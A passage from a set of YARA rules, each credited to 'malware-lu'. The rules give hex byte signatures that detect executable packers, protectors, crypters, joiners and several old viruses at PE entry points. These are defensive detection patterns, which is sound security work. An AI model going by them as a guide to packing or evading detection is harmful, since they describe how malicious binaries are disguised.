-	$a1 = { B8 ?? ?? ?? ?? 60 0B C0 74 68 E8 00 00 00 00 58 05 53 00 00 00 80 38 E9 75 13 61 EB 45 DB 2D 37 ?? ?? ?? FF FF FF FF FF FF FF FF 3D 40 E8 00 00 00 00 58 25 00 F0 FF FF 33 FF 66 BB 19 5A 66 83 C3 34 66 39 18 75 12 0F B7 50 3C 03 D0 BB E9 44 00 00 83 C3 67 39 1A 74 07 2D 00 10 00 00 EB DA 8B F8 B8 ?? ?? ?? ?? 03 C7 B9 ?? ?? ?? ?? 03 CF EB 0A B8 ?? ?? ?? ?? B9 ?? ?? ?? ?? 50 51 E8 84 00 00 00 E8 00 00 00 00 58 2D 26 00 00 00 B9 EF 01 00 00 C6 00 E9 83 E9 05 89 48 01 61 E9 }
-
-condition:
-		$a0 at pe.entry_point or $a1 at pe.entry_point
-}
-	
-	
-rule EXEJoinerv10
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 68 00 10 40 00 68 04 01 00 00 E8 39 03 00 00 05 00 10 40 C6 00 5C 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A 00 E8 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule MicroJoiner11coban2k
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { BE 0C 70 40 00 BB F8 11 40 00 33 ED 83 EE 04 39 2E 74 11 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule PseudoSigner01FSG10Anorganix
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 90 90 90 90 68 ?? ?? ?? ?? 67 64 FF 36 00 00 67 64 89 26 00 00 F1 90 90 90 90 BB D0 01 40 00 BF 00 10 40 00 BE 90 90 90 90 53 E8 0A 00 00 00 02 D2 75 05 8A 16 46 12 D2 C3 FC B2 80 A4 6A 02 5B E9 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule Armadillov200b2200b3
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 55 8B EC 6A FF 68 00 F2 40 00 68 C4 A0 40 00 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 83 EC 58 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule RAZOR1911encruptor
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { E8 ?? ?? BF ?? ?? 3B FC 72 ?? B4 4C CD 21 BE ?? ?? B9 ?? ?? FD F3 A5 FC }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule tElock051tE
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { C1 EE 00 66 8B C9 EB 01 EB 60 EB 01 EB 9C E8 00 00 00 00 5E 83 C6 5E 8B FE 68 79 01 00 00 59 EB 01 EB AC 54 E8 03 00 00 00 5C EB 08 8D 64 24 04 FF 64 24 FC 6A 05 D0 2C 24 72 01 E8 01 24 24 5C F7 DC EB 02 CD 20 8D 64 24 FE F7 DC EB 02 CD 20 FE C8 E8 00 00 00 00 32 C1 EB 02 82 0D AA EB 03 82 0D 58 EB 02 1D 7A 49 EB 05 E8 01 00 00 00 7F AE 14 7E A0 77 76 75 74 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule SDProtectorBasicProEdition112RandyLi
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 55 8B EC 6A FF 68 1D 32 13 05 68 88 88 88 08 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 58 64 A3 00 00 00 00 58 58 58 58 8B E8 E8 3B 00 00 00 E8 01 00 00 00 FF 58 05 53 00 00 00 51 8B 4C 24 10 89 81 B8 00 00 00 B8 55 01 00 00 89 41 20 33 C0 89 41 04 89 41 08 89 41 0C 89 41 10 59 C3 C3 C3 C3 C3 C3 C3 C3 C3 C3 C3 C3 C3 33 C0 64 FF 30 64 89 20 9C 80 4C 24 01 01 9D 90 90 C3 C3 C3 C3 C3 C3 C3 C3 C3 C3 C3 C3 64 8F 00 58 74 07 75 05 19 32 67 E8 E8 74 27 75 25 EB 00 EB FC 68 39 44 CD 00 59 9C 50 74 0F 75 0D E8 59 C2 04 00 55 8B EC E9 FA FF FF 0E E8 EF FF FF FF 56 57 53 78 03 79 01 E8 68 A2 AF 47 01 59 E8 01 00 00 00 FF 58 05 7B 03 00 00 03 C8 74 C4 75 C2 E8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 E2 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule VxFaxFreeTopo
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { FA 06 33 C0 8E C0 B8 ?? ?? 26 ?? ?? ?? ?? 50 8C C8 26 ?? ?? ?? ?? 50 CC 58 9D 58 26 ?? ?? ?? ?? 58 26 ?? ?? ?? ?? 07 FB }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule PseudoSigner02MEW11SE10Anorganix
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { E9 09 00 00 00 00 00 00 02 00 00 00 0C 90 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule Joinersignfrompinch250320072010
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 81 EC 04 01 00 00 8B F4 68 04 01 00 00 56 6A 00 E8 7C 01 00 00 33 C0 6A 00 68 80 00 00 00 6A 03 6A 00 6A 00 68 00 00 00 80 56 E8 50 01 00 00 8B D8 6A 00 6A 00 6A 00 6A 02 6A 00 53 E8 44 01 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule VxSK
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { CD 20 B8 03 00 CD 10 51 E8 00 00 5E 83 EE 09 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule PEStubOEPv1x
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 40 48 BE 00 ?? ?? 00 40 48 60 33 C0 B8 ?? ?? ?? 00 FF E0 C3 C3 }
-
-condition:
-		$a0
-}
-	
-	
-rule MoleBoxV23XMoleStudiocom
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { E8 00 00 00 00 60 E8 4F 00 00 00 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule VxHymn1865
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { E8 ?? ?? 5E 83 EE 4C FC 2E ?? ?? ?? ?? 4D 5A ?? ?? FA 8B E6 81 ?? ?? ?? FB 3B ?? ?? ?? ?? ?? 2E ?? ?? ?? ?? ?? 50 06 56 1E 0E 1F B8 00 C5 CD 21 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule kkrunchyRyd
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { BD 08 ?? ?? 00 C7 45 00 ?? ?? ?? 00 FF 4D 08 C6 45 0C 05 8D 7D 14 31 C0 B4 04 89 C1 F3 AB BF ?? ?? ?? 00 57 BE ?? ?? ?? 00 31 C9 41 FF 4D 0C 8D 9C 8D A0 00 00 00 FF D6 10 C9 73 F3 FF 45 0C 91 AA 83 C9 FF 8D 5C 8D 18 FF D6 74 DD E3 17 8D 5D 1C FF D6 74 10 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule PECryptv100v101
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { E8 ?? ?? ?? ?? 5B 83 EB 05 EB 04 52 4E 44 21 EB 02 CD 20 EB }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule CERBERUSv20
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 9C 2B ED 8C ?? ?? 8C ?? ?? FA E4 ?? 88 ?? ?? 16 07 BF ?? ?? 8E DD 9B F5 B9 ?? ?? FC F3 A5 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule EXECryptor2117StrongbitSoftCompleteDevelopment
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { BE ?? ?? ?? ?? B8 00 00 ?? ?? 89 45 FC 89 C2 8B 46 0C 09 C0 0F 84 ?? 00 00 00 01 D0 89 C3 50 FF 15 94 ?? ?? ?? 09 C0 0F 85 0F 00 00 00 53 FF 15 98 ?? ?? ?? 09 C0 0F 84 ?? 00 00 00 89 45 F8 6A 00 8F 45 F4 8B 06 09 C0 8B 55 FC 0F 85 03 00 00 00 8B 46 10 01 }
-
-condition:
-		$a0
-}
-	
-	
-rule WWPACKv303
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { B8 ?? ?? 8C CA 03 D0 8C C9 81 C1 ?? ?? 51 B9 ?? ?? 51 06 06 BB ?? ?? 53 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule GHFProtectorpackonlyGPcH
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 60 68 ?? ?? ?? ?? B8 ?? ?? ?? ?? FF 10 68 ?? ?? ?? ?? 50 B8 ?? ?? ?? ?? FF 10 68 00 00 00 00 6A 40 FF D0 89 05 ?? ?? ?? ?? 89 C7 BE ?? ?? ?? ?? 60 FC B2 80 31 DB A4 B3 02 E8 6D 00 00 00 73 F6 31 C9 E8 64 00 00 00 73 1C 31 C0 E8 5B 00 00 00 73 23 B3 02 41 B0 10 E8 4F 00 00 00 10 C0 73 F7 75 3F AA EB D4 E8 4D 00 00 00 29 D9 75 10 E8 42 00 00 00 EB 28 AC D1 E8 74 4D 11 C9 EB 1C 91 48 C1 E0 08 AC E8 2C 00 00 00 3D 00 7D 00 00 73 0A 80 FC 05 73 06 83 F8 7F 77 02 41 41 95 89 E8 B3 01 56 89 FE 29 C6 F3 A4 5E EB 8E 00 D2 75 05 8A 16 46 10 D2 C3 31 C9 41 E8 EE FF FF FF 11 C9 E8 E7 FF FF FF 72 F2 C3 61 B9 FC FF FF FF 8B 1C 08 89 99 ?? ?? ?? ?? E2 F5 90 90 BA ?? ?? ?? ?? BE ?? ?? ?? ?? 01 D6 8B 46 0C 85 C0 0F 84 87 00 00 00 01 D0 89 C3 50 B8 ?? ?? ?? ?? FF 10 85 C0 75 08 53 B8 ?? ?? ?? ?? FF 10 89 05 ?? ?? ?? ?? C7 05 ?? ?? ?? ?? 00 00 00 00 BA ?? ?? ?? ?? 8B 06 85 C0 75 03 8B 46 10 01 D0 03 05 ?? ?? ?? ?? 8B 18 8B 7E 10 01 D7 03 3D ?? ?? ?? ?? 85 DB 74 2B F7 C3 00 00 00 80 75 04 01 D3 43 43 81 E3 FF FF FF 0F 53 FF 35 ?? ?? ?? ?? B8 ?? ?? ?? ?? FF 10 89 07 83 05 ?? ?? ?? ?? 04 EB AE 83 C6 14 BA ?? ?? ?? ?? E9 6E FF FF FF 68 ?? ?? ?? ?? B8 ?? ?? ?? ?? FF 10 68 ?? ?? ?? ?? 50 B8 ?? ?? ?? ?? FF 10 8B 15 ?? ?? ?? ?? 52 FF D0 61 BA ?? ?? ?? ?? FF E2 90 C3 }
-	$a1 = { 60 68 ?? ?? ?? ?? B8 ?? ?? ?? ?? FF 10 68 ?? ?? ?? ?? 50 B8 ?? ?? ?? ?? FF 10 68 00 00 00 00 6A 40 FF D0 89 05 ?? ?? ?? ?? 89 C7 BE ?? ?? ?? ?? 60 FC B2 80 31 DB A4 B3 02 E8 6D 00 00 00 73 F6 31 C9 E8 64 00 00 00 73 1C 31 C0 E8 5B 00 00 00 73 23 B3 02 41 }
-
-condition:
-		$a0 at pe.entry_point or $a1
-}
-	
-	
-rule yzpackV11UsAr
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 60 33 C0 8D 48 07 50 E2 FD 8B EC 64 8B 40 30 78 0C 8B 40 0C 8B 70 1C AD 8B 40 08 EB 09 8B 40 34 8D 40 7C 8B 40 3C 89 45 04 E8 F3 07 00 00 60 8B 5D 04 8B 73 3C 8B 74 33 78 03 F3 56 8B 76 20 03 F3 33 C9 49 92 41 AD 03 C3 52 33 FF 0F B6 10 38 F2 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule VxDanishtiny
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 33 C9 B4 4E CD 21 73 02 FF ?? BA ?? 00 B8 ?? 3D CD 21 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule UPXV194MarkusOberhumerLaszloMolnarJohnReiser
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { FF D5 80 A7 ?? ?? ?? ?? ?? 58 50 54 50 53 57 FF D5 58 61 8D 44 24 ?? 6A 00 39 C4 75 FA 83 EC 80 E9 }
-
-condition:
-		$a0
-}
-	
-	
-rule yzpack112UsAr
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 5A 52 45 60 83 EC 18 8B EC 8B FC 33 C0 64 8B 40 30 78 0C 8B 40 0C 8B 70 1C AD 8B 40 08 EB 09 8B 40 34 83 C0 7C 8B 40 3C AB E9 ?? ?? ?? ?? B4 09 BA 00 00 1F CD 21 B8 01 4C CD 21 40 00 00 00 50 45 00 00 4C 01 02 00 ?? ?? ?? ?? 00 00 00 00 00 00 00 00 E0 00 ?? ?? 0B 01 ?? ?? ?? ?? 00 00 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule PseudoSigner02YodasProtector102Anorganix
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { E8 03 00 00 00 EB 01 90 90 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule PseudoSigner02PESHiELD025Anorganix
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 60 E8 2B 00 00 00 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 CC CC }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule NsPacKV34V35LiuXingPing
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 9C 60 E8 00 00 00 00 5D 83 ED 07 8D 85 ?? ?? ?? ?? 80 38 01 0F 84 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule DualseXe10
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 55 8B EC 81 EC 00 05 00 00 E8 00 00 00 00 5D 81 ED 0E 00 00 00 8D 85 08 03 00 00 89 28 33 FF 8D 85 7D 02 00 00 8D 8D 08 03 00 00 2B C8 8B 9D 58 03 00 00 E8 1C 02 00 00 8D 9D 61 02 00 00 8D B5 7C 02 00 00 46 80 3E 00 74 24 56 FF 95 0A 04 00 00 46 80 3E 00 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule NoodleCryptv200EngNoodleSpa
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { EB 01 9A E8 76 00 00 00 EB 01 9A E8 65 00 00 00 EB 01 9A E8 7D 00 00 00 EB 01 9A E8 55 00 00 00 EB 01 9A E8 43 04 00 00 EB 01 9A E8 E1 00 00 00 EB 01 9A E8 3D 00 00 00 EB 01 9A E8 EB 01 00 00 EB 01 9A E8 2C 04 00 00 EB 01 9A E8 25 00 00 00 EB 01 9A E8 02 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule SoftComp1xBGSoftPT
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { E8 00 00 00 00 81 2C 24 3A 10 41 00 5D E8 00 00 00 00 81 2C 24 31 01 00 00 8B 85 2A 0F 41 00 29 04 24 8B 04 24 89 85 2A 0F 41 00 58 8B 85 2A 0F 41 00 }
-
-condition:
-		$a0
-}
-	
-	
-rule Petite13c1998IanLuck
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 9C 60 50 8D 88 00 ?? ?? ?? 8D 90 ?? ?? 00 00 8B DC 8B E1 68 00 00 ?? ?? 53 50 80 04 24 08 50 80 04 24 42 50 80 04 24 61 50 80 04 24 9D 50 80 04 24 BB 83 3A 00 0F 84 DA 14 00 00 8B 44 24 18 F6 42 03 80 74 19 FD 80 72 03 80 8B F0 8B F8 03 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule PENightMarev13
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 60 E8 00 00 00 00 5D B9 ?? ?? ?? ?? 80 31 15 41 81 F9 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule Armadillo50DllSiliconRealmsToolworks
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 83 7C 24 08 01 75 05 E8 DE 4B 00 00 FF 74 24 04 8B 4C 24 10 8B 54 24 0C E8 ED FE FF FF 59 C2 0C 00 6A 0C 68 ?? ?? ?? ?? E8 E5 24 00 00 8B 4D 08 33 FF 3B CF 76 2E 6A E0 58 33 D2 F7 F1 3B 45 0C 1B C0 40 75 1F E8 8F 15 00 00 C7 00 0C 00 00 00 57 57 57 57 57 E8 20 15 00 00 83 C4 14 33 C0 E9 D5 00 00 00 0F AF 4D 0C 8B F1 89 75 08 3B F7 75 03 33 F6 46 33 DB 89 5D E4 83 FE E0 77 69 83 3D ?? ?? ?? ?? 03 75 4B 83 C6 0F 83 E6 F0 89 75 0C 8B 45 08 3B 05 ?? ?? ?? ?? 77 37 6A 04 E8 D7 23 00 00 59 89 7D FC FF 75 08 E8 EC 53 00 00 59 89 45 E4 C7 45 FC FE FF FF FF E8 5F 00 00 00 8B 5D E4 3B DF 74 11 FF 75 08 57 53 E8 2B C5 FF FF 83 C4 0C 3B DF 75 61 56 6A 08 FF 35 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8B D8 3B DF 75 4C 39 3D ?? ?? ?? ?? 74 33 56 E8 19 ED FF FF 59 85 C0 0F 85 72 FF FF FF 8B 45 10 3B C7 0F 84 50 FF FF FF C7 00 0C 00 00 00 E9 45 FF FF FF 33 FF 8B 75 0C 6A 04 E8 7D 22 00 00 59 C3 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule ObsidiumV1350ObsidiumSoftware
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { EB 03 ?? ?? ?? E8 ?? ?? ?? ?? EB 02 ?? ?? EB 04 ?? ?? ?? ?? 8B 54 24 0C EB 04 ?? ?? ?? ?? 83 82 B8 00 00 00 20 EB 03 ?? ?? ?? 33 C0 EB 01 ?? C3 EB 02 ?? ?? EB 03 ?? ?? ?? 64 67 FF 36 00 00 EB 03 ?? ?? ?? 64 67 89 26 00 00 EB 01 ?? EB 04 ?? ?? ?? ?? 50 EB 04 ?? ?? ?? ?? 33 C0 EB 04 ?? ?? ?? ?? 8B 00 EB 03 ?? ?? ?? C3 EB 02 ?? ?? E9 FA 00 00 00 EB 01 ?? E8 ?? ?? ?? ?? EB 01 ?? EB 02 ?? ?? 58 EB 04 ?? ?? ?? ?? EB 02 ?? ?? 64 67 8F 06 00 00 EB 02 ?? ?? 83 C4 04 EB 01 ?? E8 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule ASProtectv123RC1
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 68 01 ?? ?? 00 E8 01 00 00 00 C3 C3 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule PUNiSHERv15DEMOFEUERRADERAHTeam
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { EB 04 83 A4 BC CE 60 EB 04 80 BC 04 11 E8 00 00 00 00 81 2C 24 CA C2 41 00 EB 04 64 6B 88 18 5D E8 00 00 00 00 EB 04 64 6B 88 18 81 2C 24 86 00 00 00 EB 04 64 6B 88 18 8B 85 9C C2 41 00 EB 04 64 6B 88 18 29 04 24 EB 04 64 6B 88 18 EB 04 64 6B 88 18 8B 04 }
-	$a1 = { EB 04 83 A4 BC CE 60 EB 04 80 BC 04 11 E8 00 00 00 00 81 2C 24 CA C2 41 00 EB 04 64 6B 88 18 5D E8 00 00 00 00 EB 04 64 6B 88 18 81 2C 24 86 00 00 00 EB 04 64 6B 88 18 8B 85 9C C2 41 00 EB 04 64 6B 88 18 29 04 24 EB 04 64 6B 88 18 EB 04 64 6B 88 18 8B 04 24 EB 04 64 6B 88 18 89 85 9C C2 41 00 EB 04 64 6B 88 18 58 68 9F 6F 56 B6 50 E8 5D 00 00 00 EB FF 71 78 C2 50 00 EB D3 5B F3 68 89 5C 24 48 5C 24 58 FF 8D 5C 24 58 5B 83 C3 4C 75 F4 5A 8D 71 78 75 09 81 F3 EB FF 52 BA 01 00 83 EB FC 4A FF 71 0F 75 19 8B 5C 24 00 00 81 33 50 53 8B 1B 0F FF C6 75 1B 81 F3 EB 87 1C 24 8B 8B 04 24 83 EC FC EB 01 E8 83 EC FC E9 E7 00 00 00 58 EB FF F0 EB FF C0 83 E8 FD EB FF 30 E8 C9 00 00 00 89 E0 EB FF D0 EB FF 71 0F 83 C0 01 EB FF 70 F0 71 EE EB FA EB 83 C0 14 EB FF 70 ED }
-
-condition:
-		$a0 at pe.entry_point or $a1 at pe.entry_point
-}
-	
-	
-rule PECompactv140b2v140b4
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { EB 06 68 ?? ?? ?? ?? C3 9C 60 E8 02 ?? ?? ?? 33 C0 8B C4 83 C0 04 93 8B E3 8B 5B FC 81 EB 0F A0 40 ?? 87 DD 8B 85 A6 A0 40 ?? 01 85 03 A0 40 ?? 66 C7 85 ?? A0 40 ?? 90 90 01 85 9E A0 40 ?? BB 86 11 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule NullsoftInstallSystemv198
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 83 EC 0C 53 56 57 FF 15 2C 81 40 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule CryptoLockv202EngRyanThian
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 60 BE 15 90 40 00 8D BE EB 7F FF FF 57 83 CD FF EB 10 90 90 90 90 90 90 8A 06 46 88 07 47 }
-	$a1 = { 60 BE 15 90 40 00 8D BE EB 7F FF FF 57 83 CD FF EB 10 90 90 90 90 90 90 8A 06 46 88 07 47 01 DB 75 07 8B 1E 83 EE FC 11 DB 72 ED B8 01 00 00 00 01 DB 75 07 8B 1E 83 EE FC 11 DB 11 C0 01 DB 73 EF 75 09 8B 1E 83 EE FC 11 DB 73 E4 31 C9 83 E8 03 72 0D C1 E0 }
-	$a2 = { 60 BE ?? 90 40 00 8D BE ?? ?? FF FF 57 83 CD FF EB 10 90 90 90 90 90 90 8A 06 46 88 07 47 01 DB 75 07 8B 1E 83 EE FC 11 DB 72 ED B8 01 00 00 00 01 DB 75 07 8B 1E 83 EE FC 11 DB 11 C0 01 DB 73 EF 75 09 8B 1E 83 EE FC 11 DB 73 E4 31 C9 83 E8 03 72 0D C1 E0 }
-
-condition:
-		$a0 at pe.entry_point or $a1 at pe.entry_point or $a2 at pe.entry_point
-}
-	
-	
-rule vfpexeNcv600WangJianGuo
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 60 E8 01 00 00 00 63 58 E8 01 00 00 00 7A 58 2D 0D 10 40 00 8D 90 C1 10 40 00 52 50 8D 80 49 10 40 00 5D 50 8D 85 65 10 40 00 50 64 FF 35 00 00 00 00 64 89 25 00 00 00 00 CC }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule XPEORv099b
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { E8 00 00 00 00 5D 8B CD 81 ED 7A 29 40 00 89 AD 0F 6D 40 00 }
-	$a1 = { E8 ?? ?? ?? ?? 5D 8B CD 81 ED 7A 29 40 ?? 89 AD 0F 6D 40 }
-
-condition:
-		$a0 at pe.entry_point or $a1 at pe.entry_point
-}
-	
-	
-rule PEiDBundlev100BoBBobSoft
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 60 E8 21 02 00 00 8B 44 24 04 52 48 66 31 C0 66 81 38 4D 5A 75 F5 8B 50 3C 81 3C 02 50 45 00 00 75 E9 5A C2 04 00 60 89 DD 89 C3 8B 45 3C 8B 54 28 78 01 EA 52 8B 52 20 01 EA 31 C9 41 8B 34 8A }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule PeCompact2253276BitSumTechnologies
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { B8 ?? ?? ?? ?? 55 53 51 57 56 52 8D 98 C9 11 00 10 8B 53 18 52 8B E8 6A 40 68 00 10 00 00 FF 73 04 6A 00 8B 4B 10 03 CA 8B 01 FF D0 5A 8B F8 50 52 8B 33 8B 43 20 03 C2 8B 08 89 4B 20 8B 43 1C 03 C2 8B 08 89 4B 1C 03 F2 8B 4B 0C 03 CA 8D 43 1C 50 57 56 FF }
-
-condition:
-		$a0
-}
-	
-	
-rule PseudoSigner02CodeLockAnorganix
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 43 4F 44 45 2D 4C 4F 43 4B 2E 4F 43 58 00 01 28 01 50 4B 47 05 4C 3F B4 04 4D 4C 47 4B }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule FSGv100Engdulekxt
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { BB D0 01 40 00 BF 00 10 40 00 BE ?? ?? ?? 00 53 E8 0A 00 00 00 02 D2 75 05 8A 16 46 12 D2 C3 FC B2 80 A4 6A 02 5B FF 14 24 73 F7 33 C9 FF 14 24 73 18 33 C0 FF 14 24 73 21 B3 02 41 B0 10 FF 14 24 12 C0 73 F9 75 3F AA EB DC E8 43 00 00 00 2B CB 75 10 E8 38 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule PseudoSigner01BorlandDelphi50KOLMCKAnorganix
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 55 8B EC 90 90 90 90 68 ?? ?? ?? ?? 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 00 FF 90 90 90 90 90 90 90 90 00 01 90 90 90 90 90 90 90 90 90 EB 04 00 00 00 01 90 90 90 90 90 90 90 00 01 90 90 90 90 90 90 90 90 90 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule FlyCrypter10ut1lz
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 53 56 57 55 BB 2C ?? ?? 44 BE 00 30 44 44 BF 20 ?? ?? 44 80 7B 28 00 75 16 83 3F 00 74 11 8B 17 89 D0 33 D2 89 17 8B E8 FF D5 83 3F 00 75 EF 83 3D 04 30 44 44 00 74 06 FF 15 58 30 44 44 80 7B 28 02 75 0A 83 3E 00 75 05 33 C0 89 43 0C FF 15 20 30 44 44 80 7B 28 01 76 05 83 3E 00 74 22 8B 43 10 85 C0 74 1B FF 15 18 30 44 44 8B 53 10 8B 42 10 3B 42 04 74 0A 85 C0 74 06 50 E8 2F FA FF FF FF 15 24 30 44 44 80 7B 28 01 75 03 FF 53 24 80 7B 28 00 74 05 E8 35 FF FF FF 83 3B 00 75 17 83 3D 10 ?? ?? 44 00 74 06 FF 15 10 ?? ?? 44 8B 06 50 E8 51 FA FF FF 8B 03 56 8B F0 8B FB B9 0B 00 00 00 F3 A5 5E E9 73 FF FF FF 5D 5F 5E 5B C3 A3 00 30 44 44 E8 26 FF FF FF C3 }
-	$a1 = { 55 8B EC 83 C4 F0 53 B8 18 22 44 44 E8 7F F7 FF FF E8 0A F1 FF FF B8 09 00 00 00 E8 5C F1 FF FF 8B D8 85 DB 75 05 E8 85 FD FF FF 83 FB 01 75 05 E8 7B FD FF FF 83 FB 02 75 05 E8 D1 FD FF FF 83 FB 03 75 05 E8 87 FE FF FF 83 FB 04 75 05 E8 5D FD FF FF 83 FB 05 75 05 E8 B3 FD FF FF 83 FB 06 75 05 E8 69 FE FF FF 83 FB 07 75 05 E8 5F FE FF FF 83 FB 08 75 05 E8 95 FD FF FF 83 FB 09 75 05 E8 4B FE FF FF 5B E8 9D F2 FF FF 90 }
-
-condition:
-		$a0 or $a1 at pe.entry_point
-}
-	
-	
-rule MSLRHv032afakePECompact14xemadicius
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { EB 06 68 2E A8 00 00 C3 9C 60 E8 02 00 00 00 33 C0 8B C4 83 C0 04 93 8B E3 8B 5B FC 81 EB 3F 90 40 00 61 9D EB 05 E8 EB 04 40 00 EB FA E8 0A 00 00 00 E8 EB 0C 00 00 E8 F6 FF FF FF E8 F2 FF FF FF 83 C4 08 74 04 75 02 EB 02 EB 01 81 50 E8 02 00 00 00 29 5A 58 6B C0 03 E8 02 00 00 00 29 5A 83 C4 04 58 74 04 75 02 EB 02 EB 01 81 0F 31 50 0F 31 E8 0A 00 00 00 E8 EB 0C 00 00 E8 F6 FF FF FF E8 F2 FF FF FF }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule muckisprotectorIImucki
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { E8 24 00 00 00 8B 4C 24 0C C7 01 17 00 01 00 C7 81 B8 00 00 00 00 00 00 00 31 C0 89 41 14 89 41 18 80 6A 00 E8 85 C0 74 12 64 8B 3D 18 00 00 00 8B 7F 30 0F B6 47 02 85 C0 74 01 C3 C7 04 24 ?? ?? ?? ?? BE ?? ?? ?? ?? B9 ?? ?? ?? ?? 8A 06 F6 D0 88 06 46 E2 F7 C3 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule VcasmProtector10
-{
-      meta:
-		author="malware-lu"
-strings:
